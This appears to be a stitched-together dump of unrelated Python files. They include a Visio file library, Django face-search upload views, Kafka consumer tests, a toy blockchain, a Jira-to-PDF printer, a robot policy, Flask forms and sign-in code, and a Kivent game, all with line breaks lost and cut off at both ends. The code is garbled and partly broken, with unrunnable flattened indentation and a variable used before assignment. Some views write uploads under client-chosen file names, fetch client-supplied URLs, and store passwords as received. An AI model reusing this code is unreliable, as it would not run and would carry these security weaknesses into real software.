shapes.extend(found) return shapes def apply_text_filter(self, context: dict): # check text against all context keys text = self.text for key in context.keys(): r_key = "{{" + key + "}}" text = text.replace(r_key, str(context[key])) self.text = text for s in self.sub_shapes(): s.apply_text_filter(context) def find_replace(self, old: str, new: str): # find and replace text in this shape and sub shapes text = self.text self.text = text.replace(old, new) for s in self.sub_shapes(): s.find_replace(old, new) def remove(self): self.parent.xml.remove(self.xml) def append_shape(self, append_shape: VisioFile.Shape): # insert shape into shapes tag, and return updated shapes tag id_map = self.page.vis.increment_shape_ids(append_shape.xml, self.page) self.page.vis.update_ids(append_shape.xml, id_map) self.xml.append(append_shape.xml) @property def connects(self): # get list of connect items linking shapes connects = list() for c in self.page.connects: if self.ID in [c.shape_id, c.connector_shape_id]: connects.append(c) return connects @property def connected_shapes(self): # return a list of connected shapes shapes = list() for c in self.connects: if c.connector_shape_id != self.ID: shapes.append(self.page.find_shape_by_id(c.connector_shape_id)) if c.shape_id != self.ID: shapes.append(self.page.find_shape_by_id(c.shape_id)) return shapes class Connect: def __init__(self, xml: Element): self.xml = xml self.from_id = xml.attrib.get('FromSheet') # ref to the connector shape self.connector_shape_id = self.from_id self.to_id = xml.attrib.get('ToSheet') # ref to the shape where the connector terminates self.shape_id = self.to_id self.from_rel = xml.attrib.get('FromCell') # i.e. EndX / BeginX self.to_rel = xml.attrib.get('ToCell') # i.e. PinX def __repr__(self): return f"Connect: from={self.from_id} to={self.to_id} connector_id={self.connector_shape_id} shape_id={self.shape_id}" class Page: """Represents a page in a vsdx file :param vis: the VisioFile object the page belongs to :type vis: :class:`VisioFile` :param name: the name of the page :type name: str :param connects: a list of Connect objects in the page :type connects: List of :class:`Connect` """ def __init__(self, xml: ET.ElementTree, filename: str, page_name: str, vis: VisioFile): self._xml = xml self.filename = filename self.name = page_name self.vis = vis self.connects = self.get_connects() self.max_id = 0 def __repr__(self): return f"" def set_name(self, value: str): # todo: change to name property pages_filename = self.vis._pages_filename() # pages contains Page name, width, height, mapped to Id pages = file_to_xml(pages_filename) # this contains a list of pages with rel_id and filename page = pages.getroot().find(f"{namespace}Page[{self.index_num + 1}]") #print(f"set_name() page={VisioFile.pretty_print_element(page)}") if page: page.attrib['Name'] = value self.name = value self.vis.pages_xml = pages @property def xml(self): return self._xml @xml.setter def xml(self, value): self._xml = value @property def shapes(self): """Return a list of :class:`Shape` objects Note: typically returns one :class:`Shape` object which itself contains :class:`Shape` objects """ return [VisioFile.Shape(xml=shapes, parent=self, page=self) for shapes in self.xml.findall(f"{namespace}Shapes")] def set_max_ids(self): # get maximum shape id from xml in page for shapes in self.shapes: for shape in shapes.sub_shapes(): id = shape.get_max_id() if id > self.max_id: self.max_id = id return self.max_id @property def index_num(self): # return zero-based index of this page in parent VisioFile.pages list return self.vis.pages.index(self) def get_connects(self): elements = self.xml.findall(f".//{namespace}Connect") # search recursively connects = [VisioFile.Connect(e) for e in elements] return connects def get_connectors_between(self, shape_a_id: str='', shape_a_text: str='', shape_b_id: str='', shape_b_text: str=''): shape_a = self.find_shape_by_id(shape_a_id) if shape_a_id else self.find_shape_by_text(shape_a_text) shape_b = self.find_shape_by_id(shape_b_id) if shape_b_id else self.find_shape_by_text(shape_b_text) connector_ids = set(a.ID for a in shape_a.connected_shapes).intersection( set(b.ID for b in shape_b.connected_shapes)) connectors = set() for id in connector_ids: connectors.add(self.find_shape_by_id(id)) return connectors def apply_text_context(self, context: dict): for s in self.shapes: s.apply_text_filter(context) def find_replace(self, old: str, new: str): for s in self.shapes: s.find_replace(old, new) def find_shape_by_id(self, shape_id) -> VisioFile.Shape: for s in self.shapes: found = s.find_shape_by_id(shape_id) if found: return found def find_shapes_by_id(self, shape_id) -> List[VisioFile.Shape]: # return all shapes by ID found = list() for s in self.shapes: found = s.find_shapes_by_id(shape_id) if found: return found return found def find_shapes_with_same_master(self, shape: VisioFile.Shape) -> List[VisioFile.Shape]: # return all shapes with master found = list() for s in self.shapes: found = s.find_shapes_by_master(master_page_ID=shape.master_page_ID, master_shape_ID=shape.master_shape_ID) if found: return found return found def find_shape_by_text(self, text: str) -> VisioFile.Shape: for s in self.shapes: found = s.find_shape_by_text(text) if found: return found def find_shapes_by_text(self, text: str) -> List[VisioFile.Shape]: shapes = list() for s in self.shapes: found = s.find_shapes_by_text(text) if found: shapes.extend(found) return shapes def file_to_xml(filename: str) -> ET.ElementTree: """Import a file as an ElementTree""" try: tree = ET.parse(filename) return tree except FileNotFoundError: pass # return None def xml_to_file(xml: ET.ElementTree, filename: str): """Save an ElementTree to a file""" xml.write(filename) import base64 import io import json import os import pickle import time import numpy as np import requests from django.core.files.uploadedfile import InMemoryUploadedFile from django.http import HttpResponse from numpy.linalg import norm from cv.cfg import cfg from cv.models.numpy_encoder import NumpyEncoder from utils.feat_extractor import ext_face_feats from cv.models.net_sphere import SphereFaceNet BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) URL_PORT = 'http://localhost:8001' class FaceSearcher: """ Face Search Class Wrapper """ def __init__(self, face_feats_path=os.path.join(cfg['model_zoo_base'], 'face_features_gallery.pkl')): assert os.path.exists(face_feats_path) with open(face_feats_path, mode='rb') as f: face_feats_list = pickle.load(f) self.topK = 10 self.face_feats_list = face_feats_list self.sphere_face = SphereFaceNet(feature=True) def search(self, img_file): face_feat = ext_face_feats(sphere_face=SphereFaceNet(feature=True), img_path=img_file) compare_result = {} for face_obj in self.face_feats_list: norm_face_feature = face_feat['feature'] / np.linalg.norm(face_feat['feature']) norm_face_obj_feature = face_obj['feature'] / np.linalg.norm(face_obj['feature']) cos_sim = np.dot(norm_face_feature, norm_face_obj_feature) / \ (norm(norm_face_feature) * norm(norm_face_obj_feature)) compare_result[face_obj['studentid']] = cos_sim sorted_compare_result = sorted(compare_result.items(), key=lambda kv: kv[1], reverse=True) return { 'status': 0, 'message': 'Success', 'results': sorted_compare_result[0: self.topK] } face_searcher = FaceSearcher() def upload_and_ext_face_feats(request): """ upload and extract face features :param request: :return: """ image_dir = 'cv/static/FaceUpload' if not os.path.exists(image_dir): os.makedirs(image_dir) result = {} if request.method == "POST": image = request.FILES.get("image", None) if not image: result['code'] = 1 result['msg'] = 'Invalid Image' result['results'] = None json_result = json.dumps(result, ensure_ascii=False) return HttpResponse(json_result) else: destination = open(os.path.join(image_dir, image.name), 'wb+') for chunk in image.chunks(): destination.write(chunk) destination.close() tik = time.time() imagepath = URL_PORT + '/static/FaceUpload/' + image.name face_feats_result = ext_face_feats(os.path.join(image_dir, image.name)) result['code'] = 0 result['msg'] = 'Success' result['imgpath'] = imagepath result['results'] = face_feats_result['feature'] result['elapse'] = round(time.time() - tik, 2) json_str = json.dumps(result, ensure_ascii=False) return HttpResponse(json_str) else: result['code'] = 2 result['msg'] = 'Invalid HTTP Method' result['data'] = None json_result = json.dumps(result, ensure_ascii=False) return HttpResponse(json_result) def upload_and_search_face(request): """ upload and search face :param request: :return: """ image_dir = 'cv/static/FaceUpload' if not os.path.exists(image_dir): os.makedirs(image_dir) tik = time.time() result = {} if request.method == "POST": image = request.FILES.get("image", None) if not image: result['code'] = 1 result['msg'] = 'invalid image' result['results'] = None json_result = json.dumps(result, ensure_ascii=False) return HttpResponse(json_result) if not isinstance(image, InMemoryUploadedFile): imgstr = request.POST.get("image", None) if 'http' in imgstr: response = requests.get(imgstr) image = InMemoryUploadedFile(io.BytesIO(response.content), name="{}.jpg".format(str(time.time())), field_name="image", content_type="image/jpeg", size=1347415, charset=None) else: image = InMemoryUploadedFile(io.BytesIO(base64.b64decode(imgstr)), name="{}.jpg".format(str(time.time())), field_name="image", content_type="image/jpeg", size=1347415, charset=None) else: destination = open(os.path.join(image_dir, image.name), 'wb+') for chunk in image.chunks(): destination.write(chunk) destination.close() result['code'] = 0 result['msg'] = 'Success' result['results'] = face_searcher.search(os.path.join(image_dir, image.name))['results'] result['elapse'] = round(time.time() - tik, 2) json_str = json.dumps(result, ensure_ascii=False, cls=NumpyEncoder) return HttpResponse(json_str) else: result['code'] = 3 result['msg'] = 'Invalid HTTP Method' result['data'] = None json_result = json.dumps(result, ensure_ascii=False) return HttpResponse(json_result) tests/stateful_consumer/test_bootstrap_state.py0 from unittest.mock import patch from snuba.datasets.storages import StorageKey from snuba.datasets.storages.factory import get_cdc_storage from snuba.stateful_consumer import ConsumerStateCompletionEvent from snuba.consumers.strict_consumer import StrictConsumer from snuba.stateful_consumer.states.bootstrap import BootstrapState from tests.backends.confluent_kafka import ( FakeConfluentKafkaConsumer, build_confluent_kafka_message, ) class TestBootstrapState: def __consumer(self, on_message) -> StrictConsumer: return StrictConsumer( topic="topic", bootstrap_servers="somewhere", group_id="something", auto_offset_reset="earliest", partition_assignment_timeout=1, on_partitions_assigned=None, on_partitions_revoked=None, on_message=on_message, ) @patch("snuba.consumers.strict_consumer.StrictConsumer._create_consumer") def test_empty_topic(self, create_consumer) -> None: kafka_consumer = FakeConfluentKafkaConsumer() kafka_consumer.items = [ build_confluent_kafka_message(0, 0, None, True), ] create_consumer.return_value = kafka_consumer bootstrap = BootstrapState( "cdc_control", "somewhere", "something", get_cdc_storage(StorageKey.GROUPEDMESSAGES), ) ret = bootstrap.handle(None) assert ret[0] == ConsumerStateCompletionEvent.NO_SNAPSHOT assert kafka_consumer.commit_calls == 0 @patch("snuba.consumers.strict_consumer.StrictConsumer._create_consumer") def test_snapshot_for_other_table(self, create_consumer) -> None: kafka_consumer = FakeConfluentKafkaConsumer() kafka_consumer.items = [ build_confluent_kafka_message( 0, 0, b'{"snapshot-id":"abc123", "tables": ["someone_else"], "product":"snuba", "event":"snapshot-init"}', False, ), build_confluent_kafka_message(0, 0, None, True), ] create_consumer.return_value = kafka_consumer bootstrap = BootstrapState( "cdc_control", "somewhere", "something", get_cdc_storage(StorageKey.GROUPEDMESSAGES), ) ret = bootstrap.handle(None) assert ret[0] == ConsumerStateCompletionEvent.NO_SNAPSHOT assert kafka_consumer.commit_calls == 1 @patch("snuba.consumers.strict_consumer.StrictConsumer._create_consumer") def test_init_snapshot(self, create_consumer) -> None: kafka_consumer = FakeConfluentKafkaConsumer() kafka_consumer.items = [ build_confluent_kafka_message( 0, 0, b'{"snapshot-id":"abc123", "tables": ["sentry_groupedmessage"], "product":"snuba", "event":"snapshot-init"}', False, ), build_confluent_kafka_message(0, 0, None, True), ] create_consumer.return_value = kafka_consumer bootstrap = BootstrapState( "cdc_control", "somewhere", "something", get_cdc_storage(StorageKey.GROUPEDMESSAGES), ) ret = bootstrap.handle(None) assert ret[0] == ConsumerStateCompletionEvent.SNAPSHOT_INIT_RECEIVED assert kafka_consumer.commit_calls == 0 @patch("snuba.consumers.strict_consumer.StrictConsumer._create_consumer") def test_snapshot_loaded(self, create_consumer) -> None: kafka_consumer = FakeConfluentKafkaConsumer() kafka_consumer.items = [ build_confluent_kafka_message( 0, 0, b'{"snapshot-id":"abc123", "product":"somewhere-else", "tables": [], "event":"snapshot-init"}', False, ), build_confluent_kafka_message( 1, 0, b'{"snapshot-id":"abc123", "product":"snuba", "tables": ["sentry_groupedmessage"], "event":"snapshot-init"}', False, ), build_confluent_kafka_message( 2, 0, ( b'{"snapshot-id":"abc123", "event":"snapshot-loaded",' b'"transaction-info": {"xmin":123, "xmax":124, "xip-list": []}' b"}" ), False, ), build_confluent_kafka_message(0, 0, None, True), ] create_consumer.return_value = kafka_consumer bootstrap = BootstrapState( "cdc_control", "somewhere", "something", get_cdc_storage(StorageKey.GROUPEDMESSAGES), ) ret = bootstrap.handle(None) assert ret[0] == ConsumerStateCompletionEvent.SNAPSHOT_READY_RECEIVED assert kafka_consumer.commit_calls == 2 import os import json import base64 def profile_path(profile_id, profile): """Create full path to given provide for the current user.""" user = os.path.expanduser("~") return os.path.join(user, profile_id + profile) def load_profile(f): return json.loads(base64.decodestring(open(f, 'rb').read()).encode('utf-8')) def load_from_json(file_path): """Load the stored data from json, and return as a dict.""" if os.path.exists(file_path): raw_data = open(file_path, 'rb').read() return json.loads(base64.decodestring(raw_data).decode('utf-8')) def dump_to_json(file_path, data): with open(file_path, 'wb') as f: json_data = json.dumps(data) try: f.write(base64.encodestring(json_data)) except: f.write(base64.encodestring(bytes(json_data, 'utf-8'))) user_python_daemon/user_python_daemon.py0 # Copyright 2014 icasdri __author__ = 'icasdri' import argparse import os.path import configparser import sys import importlib import logging log = logging.getLogger(__name__) DESCRIPTION = "..." VERSION = 0.1 NO_OPTIONS = [] def _parse_args(options=None): a_parser = argparse.ArgumentParser(prog="user-python-daemon", description=DESCRIPTION) a_parser.add_argument("--config-file", type=str, help="configuration file to use") a_parser.add_argument("--version", action='version', version="%(prog)s v{}".format(VERSION)) a_parser.add_argument("--debug", action='store_true') if options is None: args = a_parser.parse_args() else: args = a_parser.parse_args(options) if args.debug: log.setLevel(logging.DEBUG) handler = logging.StreamHandler(sys.stdout) log.addHandler(handler) modules = [] module_paths = [] if args.config_file is None: args.config_file = os.path.expanduser("~/.config/user_python_daemon.conf") if os.path.isfile(args.config_file): log.info("Using config file {}".format(args.config_file)) c_parser = configparser.ConfigParser() c_parser.read(args.config_file) for name in c_parser.sections(): section = c_parser[name] if "path" in section: module_paths.append(os.path.expanduser(section["path"])) if "options" in section: module = (name, section["options"].split()) else: module = (name, NO_OPTIONS) modules.append(module) return modules, module_paths def main(options=None): modules, module_paths = _parse_args(options) from dbus.mainloop.glib import DBusGMainLoop from gi.repository.GObject import MainLoop DBusGMainLoop(set_as_default=True) for path in set(module_paths): log.info("Appending path {}".format(path)) sys.path.append(path) for module_name, module_options in modules: log.info("Invoking entry_point() on module {} with options {}".format(module_name, module_options)) importlib.import_module(module_name).entry_point(module_options) log.info("Entering MainLoop") MainLoop().run() if __name__ == "__main__": main() import datetime import inquirer import json import requests from objects import Block def startup(): configs = [ inquirer.List( 'new', message='Are you generating a new blockchain or participating in an existing one?', choices=['new blockchain', 'existing blockchain'], default='new blockchain' ), inquirer.Text( 'num', message='How many blocks should be generated in the initial chain?', default='10', ), ] start = inquirer.prompt(configs) if start['new'] == 'new blockchain': return initialize_chain(int(start['num'])) else: return [] def _placeholder_algorithm(i, prev_proof, modulo=10): return (i % modulo == 0 and i % prev_proof == 0) def prove_work(prev_proof): i = prev_proof + 1 while not _placeholder_algorithm(i, prev_proof): i += 1 return i def make_genesis_block(): genesis = Block( index=0, timestamp=datetime.datetime.now(), data={'proof': 1}, prev_hash='0' ) print( f'Genesis block has been added to blockchain [ length: 1 ]\n' f'Hash: {genesis.hash}\n' ) return genesis def make_next_block(prev_block, data=None): index = prev_block.index + 1 timestamp = datetime.datetime.now() next_hash = prev_block.hash if not data: data = {'proof': prove_work(prev_block.data['proof'])} return Block(index, timestamp, data, next_hash) def initialize_chain(num_blocks): # account for 'free' genesis block n = num_blocks - 1 print(f'Initializing blockchain with {num_blocks} blocks\n') blockchain = [make_genesis_block()] prev_block = blockchain[0] for i in range(n): block = make_next_block(prev_block) blockchain.append(block) print( f'Block #{block.index} has been added to blockchain [ length: {len(blockchain)} ]\n' f'Hash: {block.hash}\n' ) prev_block = block return blockchain def find_peer_chains(peers): """ Returns all other peer blockchains when passed a list of peer URLs """ peer_chains = [] for peer_node in peers: resp = requests.get(f'{peer_node}/blocks') block = json.loads(resp.content) peer_chains.append(block) return peer_chains def get_consensus_chain(peers): peer_chains = find_peer_chains(peers) # if the local chain is not currently the longest, # replace it with the longest one longest = blockchain for chain in peer_chains: if len(longest) < len(chain): longest = chain blockchain = longestjiraPrinter.py #!/usr/bin/python # -*- coding: utf-8 -*- import pdfkit import requests import json from xml.etree import ElementTree as ET from subprocess import call # # Take a list of issues IDs and return # - A list of issues with all of their fields # - A dictionnary of issue types icons # def getIssues(issueIDs): if len(issueIDs)%2 != 0: issueIDs.append("0") issues = [] issueTypesIcons = {} for ID in issueIDs: issue = getIssue(ID) issues.append(issue) if issue['issueType'] not in issueTypesIcons.keys(): icon = getIssueTypeIcon(issue['issueType'], issue['issueTypeIconUrl']); issueTypesIcons[issue['issueType']] = icon; return issues, issueTypesIcons # # Given an issue ID get its data from Jira # def getIssue(issueID): print("Downloading issue " + issueID) if issueID == 0: response= {} else: url = "http://" + host + ":" + port + "/rest/api/latest/issue/" + issueID querystring = {"fields": "summary,assignee,issuetype,timetracking,priority"} req = requests.get(url, auth=(username, password), params=querystring) response = json.loads(req._content) try: issueType = response['fields']['issuetype']['name'].encode('ascii', 'ignore') except: issueType = "" try: issueTypeIconUrl = response['fields']['issuetype']['iconUrl'] except: issueTypeIconUrl = "" try: summary = response['fields']['summary'].encode('ascii', 'ignore') except: summary = "" try: assignee = response['fields']['assignee']['name'].encode('ascii', 'ignore') except: assignee = "" try: priority = response['fields']['priority']['name'].encode('ascii', 'ignore') except: priority = "" try: estimatedTime = response['fields']['timetracking']['originalEstimate'].encode('ascii', 'ignore') except: estimatedTime = "" issue = dict( issueType = issueType, issueTypeIconUrl = issueTypeIconUrl, summary = summary, assignee = assignee, estimatedTime = "Duree: " + estimatedTime, reference = issueID, priority = "Priorite: " + priority ) return issue # # Given a issueType name and the URL to its logo # returned by Jira, write this image to a file # which will later be embed in the HTML document # def getIssueTypeIcon(issueType, url): print("Downloading image " + issueType) filename = "" if url: req = requests.get(url, auth=(username, password)) data = req._content filename = issueType + ".svg" with open("tmpFiles/" + filename, "w") as imageFile: imageFile.write(data); return filename def generateIssueHTML(issue, typesIcons): icon = typesIcons[issue['issueType']] br = ET.Element('br') # Create the div containing the issue div = ET.Element('div') div.set("class", "issue") divHeader = ET.Element('div') divHeader.set("class", "issue-header") div.append(divHeader) divContent = ET.Element("div") divContent.set("class", "issue-content") div.append(divContent) divFooter = ET.Element("div") divFooter.set("class", "issue-footer") div.append(divFooter) # Logo of the issue type imgIcon = ET.Element('img') divHeader.append(imgIcon) imgIcon.set('src', icon) # Reference of the issue spanReference = ET.Element('span') divHeader.append(spanReference) spanReference.text = issue['reference'] # Name of the assignee spanAssignee = ET.Element('span') divHeader.append(spanAssignee) spanAssignee.text = issue['assignee'] spanAssignee.set("class", "assignee") div.append(br) # Summary of the issue spanSummary = ET.Element('span') divContent.append(spanSummary) spanSummary.text = issue['summary'] spanSummary.set("class", "summary") div.append(br) # Priority of the issue spanPriority = ET.Element('span') divFooter.append(spanPriority) spanPriority.text = issue['priority'] div.append(br) # Estimated time to spend spanEstimatedTime = ET.Element('span') spanEstimatedTime.set("class", "estimated-time") divFooter.append(spanEstimatedTime) spanEstimatedTime.text = issue['estimatedTime'] return div # # From the list of parsed issues and the list of issues types icons # generate an HTML document which will later be used to generate # the final PDF # def generateHTML(listOfIssues, typesIcons): html = ET.Element('html') body = ET.Element('body') br = ET.Element('br') html.append(body) divs = [] for issue in listOfIssues: div = generateIssueHTML(issue, typesIcons) divs.append(div) it = iter(divs) for x in it: div1 = x div2 = next(it) line = ET.Element('div') line.set("class", "container") line.append(div1) line.append(div2) body.append(line) ET.ElementTree(html).write(open('./tmpFiles/issues.html', 'w'), encoding='ascii', method='html') styleString = """ """ with open('./tmpFiles/issues.html', 'a') as f: f.write(styleString) # # Generate the PDF file from the HTML file generated earlier # def generatePDFFromHtml(): print("Generating PDF") pdfkit.from_file('./tmpFiles/issues.html', 'issues.pdf') # # Read the config.json file to know # the jira host and the credentials # def readConfig(): global username global password global host global port # Read username and password from config file config = json.load(open('./config.json')) username = config['username'] password = config['password'] host = config['host'] port = config['port'] # # Executed no matter what happens # Delete the tmpFiles folder used to write different # temporary files during the creation process # def cleanup(): print("Cleaning up tmp files") # call(["rm", "-r", "tmpFiles"]) # # Read the list of issues from a text file in # the file system # def readIssueIDs(): with open('./issues.txt', 'r') as f: content = f.readlines() issues = [x.strip() for x in content] return issues def main(): try: # Create the temp directory call(["mkdir", "-p", "tmpFiles"]) # Initialize needed variables readConfig() issueList=readIssueIDs() if not issueList: print("No issues in issues.txt, terminating") return # Get the issues from Jira issues, typesIcons = getIssues(issueList) # Generate the HTML file used to create the PDF generateHTML(issues, typesIcons) # Generate the PDF file to print generatePDFFromHtml() finally: # Remove the temp directory cleanup() if __name__ == "__main__": main() import numpy as np from metaworld.policies.action import Action from metaworld.policies.policy import Policy, assert_fully_parsed, move hack = False class SawyerPegInsertionSideV2Policy(Policy): @staticmethod def _parse_obs(obs): if np.allclose(obs[:3], np.array([0, 0.6, 0.2]), rtol=0.1, atol=0.1) and (abs(obs[6] - 0.02) < 0.01): global hack hack = False return { 'hand_pos': obs[:3], 'gripper_distance_apart': obs[3], 'peg_pos': obs[4:7], 'peg_rot': obs[7:11], 'goal_pos': obs[-3:], 'unused_info_curr_obs': obs[11:18], '_prev_obs': obs[18:36] } def get_action(self, obs): o_d = self._parse_obs(obs) action = Action({ 'delta_pos': np.arange(3), 'grab_effort': 3 }) action['delta_pos'] = move(o_d['hand_pos'], to_xyz=self._desired_pos(o_d), p=25.) action['grab_effort'] = self._grab_effort(o_d) return action.array @staticmethod def _desired_pos(o_d): pos_curr = o_d['hand_pos'] pos_peg = o_d['peg_pos'] # lowest X is -.35, doesn't matter if we overshoot # Y is given by hole_vec # Z is constant at .16 pos_hole = np.array([-.35, o_d['goal_pos'][1], .16]) global hack if not hack: if np.linalg.norm(pos_curr[:2] - pos_peg[:2]) > .04: return pos_peg + np.array([.0, .0, .3]) elif abs(pos_curr[2] - pos_peg[2]) > .025: return pos_peg else: hack = True if hack: if np.linalg.norm(pos_peg[1:] - pos_hole[1:]) > 0.04: return pos_hole + np.array([.5, .0, .0]) else: return pos_hole @staticmethod def _grab_effort(o_d): pos_curr = o_d['hand_pos'] pos_peg = o_d['peg_pos'] if np.linalg.norm(pos_curr[:2] - pos_peg[:2]) > 0.04 \ or abs(pos_curr[2] - pos_peg[2]) > 0.15: return -1. else: return .6 class Config(object): env = 'default' backbone = 'resnet18' classify = 'softmax' num_classes = 5000 metric = 'arc_margin' easy_margin = False use_se = False loss = 'focal_loss' display = False finetune = False meta_train = '/preprocessed/train_meta.csv' train_root = '/preprocessed' train_list = 'full_data_train.txt' val_list = 'full_data_val.txt' checkpoints_path = 'checkpoints' save_interval = 1 train_batch_size = 32 # batch size input_shape = (630, 80) mp3aug_ratio = 1.0 npy_aug = True optimizer = 'sgd' use_gpu = True # use GPU or not gpu_id = '0, 1' num_workers = 0 # how many workers for loading data print_freq = 100 # print info every N batch debug_file = '/tmp/debug' # if os.path.exists(debug_file): enter ipdb result_file = '/result/submission.csv' max_epoch = 100 lr = 1e-2 # initial learning rate lr_step = 10 lr_decay = 0.5 # when val_loss increase, lr = lr*lr_decay weight_decay = 1e-1 #!/usr/bin/env python3 import numpy as np def normalizeRatings(Y, R): #NORMALIZERATINGS Preprocess data by subtracting mean rating for every #movie (every row) # [Ynorm, Ymean] = NORMALIZERATINGS(Y, R) normalized Y so that each movie # has a rating of 0 on average, and returns the mean rating in Ymean. # m, n = Y.shape Ymean = np.zeros(m) Ynorm = np.zeros(Y.shape) for i in range(m): idx = R[i, :] == 1 Ymean[i] = np.mean(Y[i, idx]) Ynorm[i, idx] = Y[i, idx] - Ymean[i] #end return Ynorm, Ymean #end from flask.views import MethodView from flask import request, jsonify from helpers.crypt import Crypt from validators.patient_val import PatientSignin from validators.doctor_val import DoctorSignin from db.cloudant.cloudant_manager import CloudantManager patient_schema = PatientSignin() doctor_schema = DoctorSignin() cm = CloudantManager() crypt = Crypt() class Signin(MethodView): def post(self): try: user_signin = request.get_json() if user_signin['role_d'] == "1": conn = cm.connect_service() my_db = cm.connect_db('health-db') if my_db == "error": raise Exception docs = cm.get_query_by(my_db, user_signin['mail_d'], 'mail_d') if docs != []: doc = docs[0] return jsonify({'st': doc['doc']['mail_d']}), 403 user_signin['password_d'] = (user_signin['password_d']) doc_msg = cm.add_doc(my_db, user_signin) if doc_msg == "ok": return jsonify({'st': 'ok'}), 200 elif doc_msg == "error": return jsonify({'st': 'error'}), 403 if user_signin['role_p'] == "2": conn = cm.connect_service() my_db = cm.connect_db('health-db') if my_db == "error": raise Exception docs = cm.get_query_by(my_db, user_signin['mail_p'], 'mail_p') if docs != []: doc = docs[0] return jsonify({'st': doc['doc']['mail_p']}), 403 user_signin['password_p'] = (user_signin['password_p']) doc_msg = cm.add_doc(my_db, user_signin) if doc_msg == "ok": return jsonify({'st': 'ok'}), 200 elif doc_msg == "error": return jsonify({'st': 'error'}), 403 except: return jsonify({"st": "error en registro"}), 403 # https://programmers.co.kr/learn/courses/30/lessons/42890# from collections import defaultdict from itertools import combinations def solution(relation): answer = 0 my_dict = defaultdict(set) for entity in relation: for i,col in enumerate(entity): my_dict[i].add(col) pk = [] npk = [] n = len(relation) for k,v in my_dict.items(): if len(v) != n: npk.append(k) else: pk.append(k) answer += len(pk) i = 2 cdk = [] while i <= len(npk): for x in combinations(npk,i): flg = True for k in cdk: if sum(1 for tx in x if tx in k) == len(k): flg = False break if not flg: continue for j in range(n): key = "".join(relation[j][k] for k in x) my_dict[x].add(key) if len(my_dict[x]) == n: answer += 1 cdk.append(x) i += 1 return answerjacobfulano/composer # Copyright 2021 MosaicML. All Rights Reserved. from dataclasses import asdict, dataclass from composer.models.model_hparams import ModelHparams @dataclass class ResNet50Hparams(ModelHparams): def initialize_object(self): from composer.models import ResNet50 return ResNet50(**asdict(self)) from flask_wtf import FlaskForm from flask_wtf.file import FileField, FileRequired from wtforms import StringField, SelectField, validators class ClientsForm(FlaskForm): name = StringField('Наименование организации') category = SelectField('Категория', coerce=int, validators=[validators.optional()], choices=[(1, "Внешний рынок"), (2, "Внутренний рынок")], render_kw={'class': 'form-control'}) file = FileField('Логотип организации', validators=[FileRequired(u'File was empty!')], render_kw={'class': 'form-control'}) class ClientsEditForm(FlaskForm): name = StringField('Наименование организации') category = SelectField('Категория', coerce=int, validators=[validators.optional()], choices=[(1, "Внешний рынок"), (2, "Внутренний рынок")], render_kw={'class': 'form-control'}) class ClientsEditPhotoForm(FlaskForm): file = FileField('Изображение руководителя', validators=[FileRequired(u'File was empty!')], render_kw={'class': 'form-control'})SleepProgger/Kivent-Examples from kivy.app import App from kivy.uix.widget import Widget from kivy.clock import Clock from kivy.core.window import Window from random import randint, choice from math import radians, pi, sin, cos import kivent_core import kivent_cymunk from kivent_core.gameworld import GameWorld, ObjectProperty from kivent_core.managers.resource_managers import texture_manager from kivent_core.systems.renderers import RotateRenderer from kivent_core.systems.position_systems import PositionSystem2D from kivent_core.systems.rotate_systems import RotateSystem2D from kivy.properties import StringProperty, NumericProperty from functools import partial texture_manager.load_atlas('assets/background_objects.atlas') class TestGame(Widget): def __init__(self, **kwargs): super(TestGame, self).__init__(**kwargs) self.gameworld.init_gameworld( ['cymunk_physics', 'rotate_color_renderer', 'rotate', 'color', 'position', 'camera1'], callback=self.init_game) def init_game(self): self.setup_states() self.set_state() # set up click event self.ids.gameworld.bind(on_touch_down=self.on_mouse_click) # lol, we need this to stop clicks on our GUI to deselect the current asteroid self._btn_pane = self.ids.gamescreenmanager.ids.main_screen.ids.bottom_pane def setup_states(self): self.gameworld.add_state(state_name='main', systems_added=['rotate_color_renderer'], systems_removed=[], systems_paused=[], systems_unpaused=['rotate_color_renderer'], screenmanager_screen='main') def set_state(self): self.gameworld.state = 'main' def on_mouse_click(self, etype, event): # Check if we clicked the bottom pane. # A better way would be to make the "game viewport" smaller and # don't just overlay our GUI, but i failed to do this so far, so... if self._btn_pane.collide_point(*event.pos): return entities = self.gameworld.entities gameview = self.gameworld.system_manager['camera1'] if not self.app.selected_id is None: ent = entities[self.app.selected_id] ent.color.r = 255 # We need to handle scrolling offsets (TODO: zoom/scale) x, y = event.pos x = x - gameview.camera_pos[0] y = y - gameview.camera_pos[1] physics = self.gameworld.system_manager['cymunk_physics'] # if you want to select a region use physics.query_bb(...) hits = physics.query_segment((x,y), (x,y)) if len(hits) > 0: ent = entities[hits[0][0]] ent.color.r = 0 self.app.selected_id = ent.entity_id gameview.entity_to_focus = ent.entity_id gameview.focus_entity = True else: self.app.selected = None gameview.focus_entity = False def draw_some_stuff(self): gameview = self.gameworld.system_manager['camera1'] x, y = int(-gameview.camera_pos[0]), int(-gameview.camera_pos[1]) w, h = int(gameview.size[0] + x), int(gameview.size[1] + y) create_asteroid = self.create_asteroid for i in range(100): pos = (randint(x, w), randint(y, h)) ent_id = create_asteroid(pos) self.app.count += 100 def create_asteroid(self, pos): x_vel = randint(-250, 250) y_vel = randint(-250, 250) angle = radians(randint(-360, 360)) angular_velocity = radians(randint(-150, -150)) shape_dict = {'inner_radius': 0, 'outer_radius': 22, 'mass': 50, 'offset': (0, 0)} col_shape = {'shape_type': 'circle', 'elasticity': .5, 'collision_type': 1, 'shape_info': shape_dict, 'friction': 1.0} col_shapes = [col_shape] physics_component = {'main_shape': 'circle', 'velocity': (x_vel, y_vel), 'position': pos, 'angle': angle, 'angular_velocity': angular_velocity, 'vel_limit': 500, 'ang_vel_limit': radians(200), 'mass': 50, 'col_shapes': col_shapes} create_component_dict = {'cymunk_physics': physics_component, 'rotate_color_renderer': { 'texture': 'asteroid1', 'size': (45, 45), 'render': True }, 'color': (255,255,255,255), 'position': pos, 'rotate': 0, } component_order = ['position', 'rotate', 'color', 'rotate_color_renderer', 'cymunk_physics',] return self.gameworld.init_entity( create_component_dict, component_order) def destroy_asteroid(self, ent_id): if ent_id is None: return #TODO: check if entity is valid gameview = self.gameworld.system_manager['camera1'] gameview.entity_to_focus = None self.app.selected_id = None self.gameworld.remove_entity(ent_id) self.app.count -= 1 def set_asteroid_velocity(self, ent_id, vx=0, vy=0): if ent_id is None: return #TODO: check if entity is valid entities = self.gameworld.entities ent = entities[ent_id].cymunk_physics ent.body.velocity = (vx, vy) class YourAppNameApp(App): count = NumericProperty(0) fps = NumericProperty(0) selected_id = None selected_coords = ObjectProperty(None, allownone=True) selected_velocity = ObjectProperty(None, 